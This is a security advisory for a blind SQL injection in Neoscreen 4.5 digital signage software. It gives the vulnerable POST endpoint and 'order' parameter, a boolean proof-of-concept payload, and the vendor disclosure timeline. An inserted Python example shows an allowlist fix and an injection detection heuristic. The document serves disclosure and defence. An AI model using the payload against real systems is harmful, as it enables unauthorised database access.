Neoscreen 4.5 Blind SQL Injection

2016-07-25T00:00:00
ID PACKETSTORM:138030
Type packetstorm
Reporter Alex Haynes
Modified 2016-07-25T00:00:00

Description

                                        
Exploit Title: Neoscreen Blind SQL injection  
Product: Neoscreen by Cube Digital Media  
Vulnerable Versions: 4.5 and all previous versions  
Tested Version: 4.5  
Advisory Publication: July 24, 2016  
Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89]  
CVE Reference: NONE  
Credit: Alex Haynes  
  
Advisory Details:  
  
  
(1) Vendor & Product Description  
--------------------------------  
  
Vendor:  
Cube Digital Media  
  
Product & Version:  
Neoscreen digital signage software v4.5  
  
Vendor URL & Download:  
http://www.cube-display.fr  
  
Product Description:  
"Neoscreen is an innovative, scalable and particularly powerful communication system.   
With just a few clicks, you can control all your dynamic display screens from your PC, wherever they may be in the world."  
  
  
(2) Vulnerability Details:  
--------------------------  
Several URLs in the management software are vulnerable to SQL injection attacks.  
  
Proof of concept:  
  
POST TO /cubelocal/modules/neoscreen/admindiff/stats_diffusion.asp?mod_stat=&machine_id=0&idpod=0 HTTP/1.1  
  
Vulnerable parameter: order  
  
Payload:  
  
idpod_choisi=tous&periodeMM=1&periodeMMFin=12&periodeAA=2015&order=IIF(5968=5968,5968,1/0)&orders=0  
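
The `order` value above is an SQL expression, not a sort key, and ORDER BY targets cannot be bound as query parameters, so the usual server-side control is an allowlist. The sketch below is an added example, not code from the advisory or from Neoscreen: it maps `order` to a fixed set of columns and flags request bodies whose `order` is not a plain key. The column names and the benign request are assumptions; the product's real schema is not given on this page.

```python
import re
from urllib.parse import parse_qs

# Hypothetical sort keys -> column names (assumed, not the Neoscreen schema).
ALLOWED_ORDER = {"0": "date_diffusion", "1": "machine_id", "2": "idpod"}

# A plain sort key is a short run of identifier characters and nothing else.
SAFE_KEY = re.compile(r"[A-Za-z0-9_]{1,32}")

# Request body quoted in the advisory, and a constructed benign request.
ADVISORY_BODY = ("idpod_choisi=tous&periodeMM=1&periodeMMFin=12&periodeAA=2015"
                 "&order=IIF(5968=5968,5968,1/0)&orders=0")
BENIGN_BODY = ("idpod_choisi=tous&periodeMM=1&periodeMMFin=12&periodeAA=2015"
               "&order=1&orders=0")


def order_clause(form_body: str) -> str:
    """Build ORDER BY from the allowlist only; never from the raw value."""
    values = parse_qs(form_body, keep_blank_values=True).get("order", ["0"])
    if len(values) != 1:
        raise ValueError("duplicate 'order' parameter")
    try:
        return f"ORDER BY {ALLOWED_ORDER[values[0]]}"
    except KeyError:
        raise ValueError(f"sort key not in allowlist: {values[0]!r}") from None


def looks_like_injection(form_body: str) -> bool:
    """Log-review heuristic: 'order' holds something other than a plain key."""
    values = parse_qs(form_body, keep_blank_values=True).get("order", [])
    return any(bool(v) and SAFE_KEY.fullmatch(v) is None for v in values)


if __name__ == "__main__":
    for label, body in (("advisory", ADVISORY_BODY), ("benign", BENIGN_BODY)):
        try:
            result = order_clause(body)
        except ValueError as exc:
            result = f"rejected ({exc})"
        print(f"{label}: suspicious={looks_like_injection(body)} -> {result}")
```
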
  
  
(3) Advisory Timeline:  
----------------------  
25/01/2016 - First Contact: vendor responds saying they are working on fix  
24/02/2016 - Follow up e-mail to request fix timeline. No vendor response.  
03/03/2016 - Follow up e-mail to request fix timeline.  
04/03/2016 - Vendor responds saying fix will be available 14/03/2016.  
  
  
(4) Solution:  
------------  
Upgrade to version 5.0  
  
  
(5) Credits:  
------------  
Discovered by Alex Haynes  